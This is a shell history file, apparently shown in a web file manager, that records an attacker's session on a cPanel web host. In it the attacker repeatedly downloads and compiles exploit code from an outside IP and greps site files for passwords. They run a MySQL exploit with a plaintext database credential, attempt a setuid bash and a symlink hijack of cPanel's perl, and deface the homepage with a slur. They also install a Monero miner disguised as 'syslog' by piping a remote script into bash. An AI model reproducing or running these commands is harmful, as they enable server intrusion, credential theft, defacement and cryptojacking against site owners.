관리-도구
편집 파일: .bash_history
/bin/cgclassify /bin/cgclassify -h ls -lah /usr/bin/lesspipe.sh cat /usr/bin/lesspipe.sh sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2- sudo -v sudo -h sudo -V cat /proc/version cd /tmp echo "#include <stdio.h>" echo "int printf(const char* x, ...); int main() { printf("hello world"); return 0; } > test.c echo "int printf(const char* x, ...); int main() { printf("hello world"); return 0; }" > test.c cd /tmp echo "int printf(const char* x, ...); int main() { printf("hello world"); return 0; }" > test.c gcc test.c echo "int printf(const char* x, ...); int main() { printf(\"hello world\"); return 0; }" > test.c gcc test.c ./a.out wget http://80.76.42.73/sp.c wget http://80.76.42.73:8000/sp.c gcc sp.c -o penis gcc sp.c -util -lpthread -o penis gcc sp.c -lutil -lpthread -o penis ./penis rm sp.c wget http://80.76.42.73:8000/sp.c wget http://80.76.42.73:8000/sp.c gcc sp.c -o penis2 file penis rm penis rm sp.c wget http://80.76.42.73:8000/sp.c gcc sp.c -o penis ./penis rm sp.c rm penis wget http://80.76.42.73:8000/sp.c gcc sp.c -o penis ./penis ls /dev/zero dmesg 2>/dev/null | grep "signature" rpm -qa | less echo $PATH uname -r ls -lah /usr/bin/mysqld_safe cat /usr/bin/mysqld_safe ls -lah /root/bin/sys-snap ps -e | grep 5339 whereis imap ps -e | grep 27111 ps -e | grep 26215 ls -lah 26215 ls -lah /usr/local/cpanel/bin/jailshell cat /usr/local/cpanel/bin/jailshell /usr/local/cpanel/bin/jailshell /usr/local/cpanel/bin/jailshell --help ls -lah /usr/local/cpanel/3rdparty/quickinstall/scripts/checkupdates.pl cat /usr/local/cpanel/3rdparty/quickinstall/scripts/checkupdates.pl cat /dev/log rpm -qa rpm -qa | less cd /tmp ls ./linpeas.sh -h ls -lah /etc/sysconfig/network-scripts ls -lah /sbin/ifup logrotate ps -e | grep log ls /bin/logrotate ls -lah /etc/profile.d/ cat /etc/profile.d/easy.sh echo "ls" >> /etc/profile.d/easy.sh cd /opt ls -lah cd python27 ls ls -lah cd .. ls -lah ls wp-cli-plugins ls -lah cpanel lscp lscpu ls su mysql sudo -l pwd cd ~ pwd ls cat php.ini ls ls -lah ls .trash -lah cat .trash/48491C7AA83FA633F7C64A9F472BC2B3.txt cat env.cgi ls cgi-bin ls cd www ls ls cgi-bin cat cgi-bin/env.cgi cat ../scgi-bin/env.cgi pwd cat ./scgi-bin/env.cgi ls cd admin ls cat index.php ls cat secure.php ls -lah cd .. ls ls emailAdmin ls cd ~ ls www cd ww ls cd www ls cat emailAdmin/index.php ls -lah emailAdmin ls -lah emailAdmin/memberAdmin find emailAdmin/memberAdmin | grep passw cat emailAdmin/memberAdmin/* | grep passw cat emailAdmin/memberAdmin/* | grep dbhost cd ~/www ls ls _notes cd lists ls ls config cat config/config.php ls cat * | grep passw cat config/* | grep passw ls config cat config/config.php cd /tmp wget http://80.76.42.73:8000/expl.c rm penis gcc expl.c -I/usr/include/mysql -lmysqlclient -o penis ./penis ./penis finest09_admin LCqR7ydNeQ1U localhost finest09_phplist ./penis finest09_admin LCqR7ydNeQ1U 50.116.78.206 finest09_phplist ls /uploads ls -lah /tmp ls -lah ~/www rm expl.c rm penis wget http://80.76.42.73:8000/expl.c gcc expl.c -I/usr/include/mysql -lmysqlclient -o penis ./penis finest09_admin LCqR7ydNeQ1U localhost finest09_phplist pwd cd ~ ls find . -exec cat {} \; | grep passw cd ~ ls -lah cd www ls -lah rm out.txt cd .. gzip cd ~ gzip --help tar --help pwd tar -czvf archive_name.tar.gz ../finest09 ls ls -lah rm archive_name.tar.gz grep -Rnw '.' -e 'passw' cd ~ grep -Rnw '.' -e 'passw' 2> /dev/null cd cd ~ ls -lah cat passwd cat passwds ls sym ls sym/root ls sym/root/home3 ls ls sym/root/home3/finest09 ls sym/root/home3/finest09 -lah ls cd public_ftp ls ls incoming ls -lah ls -lah incoming ls -lah submit cd .. ls ls public_html ls ls -lah tmp cat tmp/msg.txt ls ls -lah var ls -lah var/cpanel ls -lah ls -lah dada_files ls -lah logs ls -lah cat .viminfo ls -lah ls -lah /etc ls -lah etc ls -lah etc/finestweddingsites.com ls -lah ls -lah config cat config/config.izo ls sl -lah ls -lah ls -lah bin cat bin/pecl ls -lah cat .zshrc ls -lah .subaccounts ls -lah / ls -lah /backup ls -lah /scripts ls -lah /usr/local/cpanel/scripts ls -lah / chmod chmod u+s /bin/bash cat ~/etc/openldap/certs/password whoami who am i who tty ls -lah /etc ls -lah /var/www ls -lah /var ps -ef | grep httpd cd /usr/local/apache/bin/ ls -lah ./apachectl -V ls /usr/local/apache/conf -lah cat /usr/local/apache/conf/php.conf cat /usr/local/apache/conf/httpd.conf ls -lah /usr/local/apache/conf/original cd ~ ls -lah cat .htaccess cd www ls -lah grep -Rnw '.' -e 'passw' > passwds cat .ftpquota cd ~ cat .ftpquota ls www -lah cd ww cd www ls -lah cd blog ls -lah cat wp-config.php cd www cd ~/www ls -lah cd .. ls -lah cd fin.finestweddingsites.com ls -lah touch test.txt ls -lah rm test.txt cat /var/cpanel/cpanel.config cat /root/bin/sys-snap ls -lag /home/cpanelsolr/bin/solr ls /home -lah pwd cd /tmp wget https://raw.githubusercontent.com/mysqludf/lib_mysqludf_sys/master/lib_mysqludf_sys.c gcc lib_mysqludf_sys.c -lmysqlclient -o penislib wget https://github.com/mysqludf/lib_mysqludf_sys/raw/master/lib_mysqludf_sys.so file lib_mysqludf_sys.so gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o penisexpl.so gcc -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o penisexpl.so ls -lah mysql -u "finest09_admin" -p #1719370523 export TERM=xterm #1719370524 top #1719370535 clear #1719370567 sudo -l #1719370613 sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' #1719370635 sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2- #1719370710 netstat -tulpn #1719370752 ps -ef | grep mysql #1719370855 less ~/.bash_history #1719370913 cd ~ #1719370915 ls #1719370953 cat php.ini | grep pass #1719370960 cd www #1719370965 whoami #1719370967 ls #1719370974 sudo ls #1719370995 passwd #1719371032 tail error_log #1719371042 clear #1719371043 ls #1719371070 cat 7YrFznmkj0NG8kJlEDWUZqaCdldixu29gI4Avhuoqvs #1719371127 ls #1719371134 ls admin #1719371149 find . | grep config #1719371161 7YrFznmkj0NG8kJlEDWUZqaCdldixu29gI4Avhuoqvs #1719371169 cat ./lists/admin/configure.php #1719371410 cat ./lists/admin/defaultconfig.inc #1719371462 cat ./lists/config/config.php #1719371557 find . | grep config #1719371577 cat ./cgi-bin/uploads/config.php #1719371598 cat ./blog/wp-content/wflogs/config.php #1719371628 clear #1719371632 find . | grep config #1719371645 cat ./cgi-bin/uploads/config.xml #1719371674 cat ./blog/wp-config.php #1719371737 find . | grep config #1719371762 cd .. #1719371763 ls #1719371865 grep -nw '/path/to/somewhere/' -e 'pattern' #1719371867 clear #1719371869 grep -rnw '.' -e 'passw' #1719372092 grep -rnw '.' -e 'passw*' #1719372354 grep -rnw '.' -e 'passw*' -include=\*.{php,ini} #1719372376 grep - #1719372385 clear #1719372407 grep -rnw '.' -e 'passw*' --include=\*.{php,ini} #1719372435 grep -rnw '.' -e 'passw*' --include=\*.{php,ini} > passwd.txt #1719372443 ls #1719372454 mv passwd.txt www #1719372915 ls -lah #1719372919 cd www #1719372924 ls -alh #1719372933 cd cgi_bin #1719372942 cd cgi-bin/ #1719372942 ls #1719372952 ls -lah #1719372968 cat env.cgi #1719372974 ls old #1719372979 ls temp #1719372987 ls temp/3982151/ #1719372990 ls #1719372995 ls uploads #1719373048 cat /uploads/lol.txt #1719373060 cat uploads/lol.txt #1719373065 clear #1719373069 cat uploads/lol.txt #1719373078 cat uploads/lol.php #1719373107 ls -lah uploads/lol.php #1719373111 clear #1719373112 ls #1719373147 cd .. #1719373148 ls #1719373216 echo $PATH #1719373239 ls -lah /home/finest09/perl5/bin #1719373266 (env || set) 2>/dev/null #1719373407 dmesg #1719373416 clear #1719373418 dmesg 2>/dev/null | grep "signature" #1719373544 gdb #1719373638 crontab -l #1719373656 ls -al /etc/cron* /etc/at* #1719373852 ls -lah /usr/local/cpanel/3rdparty/bin/perl #1719373868 ls -lah /usr/local/cpanel/3rdparty/perl/526/bin/perl #1719373888 mv /usr/local/cpanel/3rdparty/bin/perl /tmp #1719373947 touch /tmp/perl #1719373975 ln -sf /tmp/perl /usr/local/cpanel/3rdparty/bin/perl #1719374091 runc #1719374158 id || (whoami && groups) 2>/dev/null #1719374172 cat /etc/passwd | cut -d: -f1 #1719374201 awk -F: '($3 == "0") {print}' /etc/passwd #1719374208 w #1719374219 last | tail #1719374243 lastlog #1719374414 systemd-run -t /bin/bash #1719374446 cat /etc/sudoers #1719374463 sudo su #1719374484 find / -perm -4000 2>/dev/null #1719374517 sudo passwd #1719374580 pt_chown #1719374588 ./usr/libexec/pt_chown #1719374597 /usr/libexec/pt_chown #1719374602 /usr/libexec/pt_chown --help #1719374638 ping 8.8.8.8 #1719374649 ping -i 0.1 8.8.8.8 ls ~/www/blog cd ~/www/log cd ~/www/blog ls -alh whoami ip a ifconfig ps -e kill 30391 30944 ps --help ps -ef kill 31402 kill 30391 30944 cat cpanelsolr whereis cpanelsolr cat /etc/mysql ls /usr/etc ls /usr cat /usr/my.cnf ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/' ps aux | grep mysql ls /var/lib/mysql/fin.finestweddingsites.com.err ls -lah /var/lib/mysql/fin.finestweddingsites.com.err tail /var/lib/mysql/fin.finestweddingsites.com.err cd /tmp ps aux | grep mysql ls -lah /var/lib/mysql ls -lah /var/lib/mysql/fin.finestweddingsites.com.err python -c 'import pty;pty.spawn("/bin/bash");' mysql -u root mysql -u root -p "123" mysql -u root -p ps -e | grep "grep" kill 14681 15068 28189 ps -e | grep "grep" kill 14681 kill -s SIVSEGV 14681 kill -s SIGSEGV 14681 kill --help kill -h ls cat Git.pm clear ls ls -lah ls home3 ls home3/finest09 ls home3/finest09 -lah ls ls /opt ls cd cd /home/finest09 ls ls public_html cat public_html/passwd.txt ls cd public_html ls echo "Дал пососать пиндосам" > index.html rm index.html echo "Dal pososat\' pindosam" > index.html rm index.html nano index.html vi index.html ls vi index.html cat index.html vi index.html rm index.html echo "<html><head> <meta charset="UTF-8"></head><body>Дал пососать пиндосам</body></html> > index.html cd cd /home/finest09/public_html ls echo "<html><head><meta charset=\"UTF-8\"></head><body>Дал пососать пиндосам</body></html>" > index.html ls cd /home/finest09/public_html ls rm index.html curl http://80.76.42.73:8000/script.txt . wget http://80.76.42.73:8000/script.txt ls mv script.txt index.html mv index.html index.php chmod +x index.php ls ls -lah ls -lah admin/index.php ls -lah index.php chmod 644 index.php ls touch access_log.txt wget http://80.76.42.73:8000/script.txt mv script.txt index.php chmod 644 index.php wget http://80.76.42.73:8000/script.txt mv script.txt index.php chmod 644 index.php wget http://80.76.42.73:8000/script.txt mv script.txt index.php chmod 644 index.php wget http://80.76.42.73:8000/script.txt mv script.txt index.php chmod 644 index.php #1743221985 ls -la #1743221997 cat .bash_history #1743222057 ls #1743222059 cat cat public_html/passwd.txt #1743222136 ls #1743222144 cat passwds #1743222155 rm passwds #1743222156 s #1743222157 ls #1743222165 cd public_ #1743222167 cd public_html/ #1743222168 ls #1743222172 cat index.php #1743222207 ls #1743222212 cat passwd.txt #1743222219 rm passwd.txt #1743222219 ls #1743222221 rm passwds #1743222222 ls #1743222226 cat access_log.txt #1743222252 l #1743222253 ls #1743222260 cd uploadtest/ #1743222261 ls #1743222264 cat post.php #1743222276 cat upload_form.html #1743222284 ls #1743222306 cd .. #1743222307 ls #1743222311 cat 7YrFznmkj0NG8kJlEDWUZqaCdldixu29gI4Avhuoqvs #1743222318 rm 7YrFznmkj0NG8kJlEDWUZqaCdldixu29gI4Avhuoqvs #1743222318 ls #1743222331 cd emailAdmin/ #1743222332 ls #1743222335 cat connect.php #1743222344 sudo echo 1 #1743222358 cat /etc/passwd #1743222401 ls #1743222406 cd .. #1743222406 ls #1743222442 cd _notes/ #1743222443 ls #1743222445 cat dwsync.xml #1743222454 cd .. #1743222456 ls #1743222457 cd .. #1743222458 ls #1743222479 ls -la #1743222507 cd .config/ #1743222507 ls #1743222510 cd procps/ #1743222510 ls #1743222518 mkdir syslog #1743222519 ls #1743222521 cd syslog/ #1743222522 ls #1743222535 export HOME=$(pwd); curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 4BBLi9uQwjY6KPz8BvncvYUFiMj1RFm2AUxTSvWsTxypYAe9zBzZE3CWA7DCYet5MpUjqRikzQpZzaX8s7KovHRyAcMVBN7 #1743222563 ls #1743222566 cd moneroocean/ #1743222566 ls #1743222568 ps aux #1743222594 cd .. #1743222594 ls #1743222603 cd - #1743222604 ps aux #1743222614 cd .. #1743222615 ls #1743222621 ls -la #1743222628 mv moneroocean/ syslog #1743222629 ls #1743222631 cd syslog/ #1743222631 ls #1743222639 rm miner.sh #1743222640 ls #1743222646 mv syslog #1743222652 mv xmrig syslo #1743222658 mv syslo syslog #1743222658 ls #1743222667 rm xmrig.log #1743222667 ls #1743222692 mv config_background.json log.json #1743222692 ls #1743222699 ./syslog -c log.json #1743222709 ps aux #1743222747 w #1743222869 ps aux #1743221907 ls #1743221918 hostname #1743221954 ps aux #1743221963 echo $SHELL #1743221969 bash #1743237605 ls #1743237606 ps aux #1743237608 w #1743237626 cd .config/procps/syslog/syslog/ #1743237628 ls #1743237657 ./syslog -o gulf.moneroocean.stream:10128 -u 4BBLi9uQwjY6KPz8BvncvYUFiMj1RFm2AUxTSvWsTxypYAe9zBzZE3CWA7DCYet5MpUjqRikzQpZzaX8s7KovHRyAcMVBN7 #1743237751 ./syslog --no-huge-pages -o gulf.moneroocean.stream:10128 -u 4BBLi9uQwjY6KPz8BvncvYUFiMj1RFm2AUxTSvWsTxypYAe9zBzZE3CWA7DCYet5MpUjqRikzQpZzaX8s7KovHRyAcMVBN7 #1743237794 ls /sys/devices/system/cpu/ #1743237814 mount | grep sysfs #1743237825 mount #1743237846 df -h #1743237856 ls #1743237858 cd #1743237859 ls #1743237862 exit #1743252258 w #1743252263 ls -la #1743252271 ps -e #1743252274 ps -ef #1743252285 cd tmp #1743252286 ls -la #1743252308 echo $PATH #1743252437 export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/cpanel/3rdparty/lib/path-bin:/usr/share/Modules/bin:/usr/local/cpanel/3rdparty/lib/path-bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/opt/cpanel/composer/bin:/home/finest09/bin" #1743252443 echo $PATH #1743252453 cd /bin #1743252454 ls #1743252487 screen #1743252496 /bin/screen #1743252509 mkdir /run/screen #1743252519 mkdir /run #1743252534 suddo #1743252536 sudo #1743252552 sudo -V #1743252556 su #1743252604 export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" #1743252606 cd #1743252608 ls #1743252611 reset #1743252623 echo $PATH #1743252627 screen #1743252631 exit #1743252640 echo $PATH #1743254589 w #1743254591 exit